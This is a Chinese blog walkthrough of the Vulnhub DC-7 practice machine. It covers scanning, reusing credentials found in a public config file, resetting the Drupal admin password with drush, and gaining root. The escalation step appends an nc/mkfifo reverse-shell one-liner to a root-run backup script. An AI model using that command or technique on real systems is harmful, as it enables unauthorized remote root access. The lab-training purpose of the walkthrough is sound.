DC-7靶场

已于 2022-09-25 15:14:42 修改
阅读量825 收藏
点赞数
文章标签: 服务器 网络安全
于 2022-08-29 16:20:14 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_49518993/article/details/126568673
版权
本文详细介绍了在DC-7靶场进行的安全演练过程,包括利用nmap扫描目标系统,dirbuster扫描目录,发现并利用靶机上的ssh服务进行登录,通过脚本文件drush修改管理员密码,安装PHP模块,以及最终实现提权和反弹shell来获取flag。
摘要由CSDN通过智能技术生成

需要准备靶机DC-7和kali系统,桥接模式:NAT

1利用nmap扫描目标系统及端口信息 nmap -A -Pn 192.168.116.152

2利用dirbuster扫描目录

 

3浏览器打开靶场

 4发现作者信息,在谷歌进行搜索

 配置文件中有一个账号密码

 5在靶机登录界面尝试登录,发现不是用户的登录密码

 6在端口扫描时发现靶机开启了ssh服务,尝试用该账户密码链接靶机

 

 7cat查看mbox文件,发现是邮件,数据库备份

 查看脚本文件

8脚本中drush命令可以对用户密码进行修改,但是要进入/var/www/html目录下才可以使用drush命令修改密码 drush user-password admin --password="123456"

9修改后的密码登录网站

 10添加php模块  https://ftp.drupal.org/files/projects/php-8.x-1.0.tar.gz

11反弹shell

12提权,在backups.sh脚本中写入root用户的反弹shell 

echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f | /bin/sh -i 2>&1 | nc 192.168.116.149 666 >/tmp/f" >> backups.sh

 拿flag

骑猪去上课
关注
Vulnhub靶场实战---DC-7
一期一会的博客
01-18 3319
0x00 环境准备 1.靶场下载官网地址 https://www.vulnhub.com/entry/dc-7,356/ 2.下载完成以后直接导入vm,kali,靶机均使用均使用NAT模式连接, 攻击机:kali 192.168.88.130 靶机:DC-7 192.168.88.133 0x01 信息收集 1.探测88网段主机,使用nmap扫描。 -sn Ping探测扫描主机,不进行端口扫描(测试过对方主机把icmp包都丢弃掉,依然能检测到对方开机状态) -sp 进行Ping扫描 -sA
DC系列靶场---DC 7靶场的渗透测试
最新发布
zhouA0221的博客
08-08 1356
通过 Drush,开发者可以在终端中执行常见的 Drupal 操作,如安装、更新、8、邮件通过脚本执行,每15分钟执行一次,把nc的反弹shell写入脚本文件,攻击端侦听,等待目标主机执行脚本。4、通过查看邮件发现使用了drupal中drush程序,这个工具可以更改用户的密码。这个时候要等,因为这个脚本文件是每15分钟执行一次,所以只需要等待就可以。3、在网站中登录发现不行,之前还扫到一个22端口,通过22端口远程登陆上。看到源码中有config的文件,这个肯定是配置文件,可以看一下。
靶场练习第十五天~vulnhub靶场dc-7
qq_57976347的博客
02-14 449
一、准备工作 kali和靶机都选择NAT模式(kali与靶机同网段) 1.靶场环境 下载链接:https://download.vulnhub.com/dc/DC-7.zip 2.kali的ip 命令:ifconfig 3.靶机的ip 扫描靶机ip sudo arp-scan -l 二、信息收集 1.nmap的信息收集 (1)扫描靶机开放的端口及其服务 nmap -A -p- 192.168.101.120 2.网站的信息收集 (1)靶机开放了80端口,先
Vulnhub系列之DC7靶场详解
weixin_50053818的博客
05-30 1250
文章目录环境信息收集安装插件拿shell提权 环境 vulhub系列之DC7靶场 VMware虚拟机 kali 信息收集 由目标靶机的MAC地址得到目标IP为192.168.137.103,直接nmap扫描。 可以知道目标开放了80和22端口,直接进入网站。 进入网站发现CMS是drupal 8,在漏洞进行搜索,无果。所以只能查看网站。翻译一下首页的内容。 欢迎来到DC-7 DC-7引入了一些“新”概念,但我将让您弄清楚它们是什么。 ???? 尽管此挑战并不是技术性的全部,但如果您需要诉诸于暴力破
靶机DC-7
weixin_43940853的博客
12-09 345
kali : 192.168.230.233 靶机 : 192.168.230.235 扫了目录,查看了robots.txt,登陆框也看了一下注入,并没有发现啥,注意到下面的@DC7USER,google一下,发现了源码,拷贝下来 打开其中的config.php,发现了一个账号密码,ssh上去直接登录成功 先进入了一个目录,查看文件后发现都是乱码 把目标放在mbox上 关注到邮件的Subj...
DC-6靶场
qq_49518993的博客
08-31 1255
DC-6靶场
DC-5靶场
qq_49518993的博客
09-24 908
dc-5靶场练习
Vulnhub靶场 DC系列 DC-4靶场
sdfsergfr的博客
12-10 403
Vulnhub靶场 CD系列 CD-4靶场 ,黑盒实验,反弹shell网站,利用22端口ssh服务,kali密码爆破,得到admin用户的密码happy,登录admin用户 bp对radio位置的发送,得到密码字典 old-passwords.bak。添加反弹shell,得到密码字典 old-passwords.bak。九头蛇hydra:利用密码字典发现ssh的账号:jim密码: jibril04 。finalshell ssh连接 对文件查找 得到用户:Charles 密码:^xHhA&hvim0y。
DC-1靶场搭建及渗透
weixin_55772865的博客
06-13 633
回到/var/www目录下,执行加密脚本 cd ../ php scripts/password-hash.sh 666。1.回到该靶场的根目录下,在scripts目录下存在hash密码加密脚本password-hash.sh。4.扫描192.168.75.129发现就是我们要找的dc-1,且开放80端口,尝试访问一下。首先查找有suid权限的文件,发现find命令有suid权限,那就利用find命令进项提权。4.更新后用户名:admin 密码:666,去开放的80端口网页访问。
DC7_靶场实战
JSH_CDX的博客
03-30 1425
DC7_靶场实战 我只是知识的搬运工 希望看完这篇博文你能解决问题
DC-7靶场实战
qq_42754807的博客
03-25 996
DC-7靶场实战
vulnhub DC7 靶场练习
鸥鹭忘机
08-20 1788
前言 这次练习的靶机是vulnhub平台下的DC系列靶机第7台,下载地址为https://www.vulnhub.com/entry/dc-7,356/。挑战该靶机的最终目的是获取root权限,然后读取唯一的flag。这台靶机中用暴力破解成功的概率非常小,我们需要开阔思路,寻找非技术上的方法。 虚拟机配置 这次采用的网络连接模式依然是NAT模式,为了避免扫描到其他物理主机。在导入虚拟机后,右击DC-6靶机,然后选中配置。依次点击网络配置->NAT模式->高级->生成,然后确认即可。 收集
DC-7靶机实战练习
千寻的博客
03-23 1254
靶机DC-7下载地址:https://download.vulnhub.com/dc/DC-7.zip 环境:VMware 15虚拟机软件 DC-7靶机IP地址:192.168.146.138 Kali的IP地址:192.168.146.130 文章目录第一部分 信息收集第一步 扫描主机第二步 扫描端口第三步 收集网站信息第四步 访问80端口第五步 收集@DC7USER信息第六步 下载源码 收集文...
Vulhub 靶场 DC-7解析
黑战士的博客
02-24 1031
kali的靶攻击机IP地址:192.168.200.14DC-7靶机的IP地址:暂时未知注意:靶机和攻击机应处于一个网卡下通过MAC地址判断靶机DC-7的IP 地址。
DC系列漏洞靶场-渗透测试学习复现(DC-4)
W983079520的博客
12-02 1298
DC-4是一个易受攻击的实验环境,最终目的是让攻击者获得root权限,并读取flag。 本篇文档中用到了exim4漏洞提权。 1 环境搭建 下载靶场文件,使用Vbox或者VM打开即可;攻击机使用kali-2020。 2 主机发现 使用Kali中的arp-scan工具扫描结果如下: 172.16.12.145为DC-4靶机的IP地址。 3 端口探测 探测使用nmap工具 端口扫描结果如下: 由扫描结果知开放端口有两个:22(SSH服务默认端口)和80(http默认端口)。 4 访
Vulnhub靶机:DC-7渗透详细过程
IerkeU的博客
03-20 1123
DC-7 前言提要 这个靶机有用到社工~,还是蛮有趣的 靶场地址:https://www.vulnhub.com/entry/dc-7,356/ DC-7是一个中级的靶场,需要具备以下前置知识: 基础的Linux命令及操作 基础的渗透测试工具使用(Kali / Parrot下的工具) 翻译一下官方给出的一些信息: 这个靶场需要具备中级的渗透测试技巧,这并不是一个很有技术性的挑战,但也不能算容易。渗透测试的和之前的 DC 靶机(哪一台就不知道了)有相似的地方,但会涉及到一些新东西,你的最终目标是放在roo
DC靶机系列——DC-7练习
shenpanzhimao的博客
03-01 892
DC靶机系列——DC-7练习 DC-7的端口服务只有22和80端口,也就是ssh登录和web服务。 在探测web服务的过程中,没有找到相应的web漏洞。 这里就要想办法通过侧面来进攻,考验的是对信息的敏感性。发现有一个@DC7USER,放在谷歌搜索一下,发现一个twitter和github,在github里面存在敏感信息,猜测可能是ssh的密码,果然进入。 获取初步权限后,继续在低权限情况下进行信...
DC-1靶场攻防:信息收集与Drupal漏洞挖掘
"DC-1靶场的攻防演练教程" 在网络安全领域,靶场是进行安全测试和技能提升的重要平台。本教程聚焦于名为DC-1的靶机,通过一系列步骤来展示如何找到并利用靶机上的漏洞来获取flag。下面我们将详细探讨这个过程。 ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值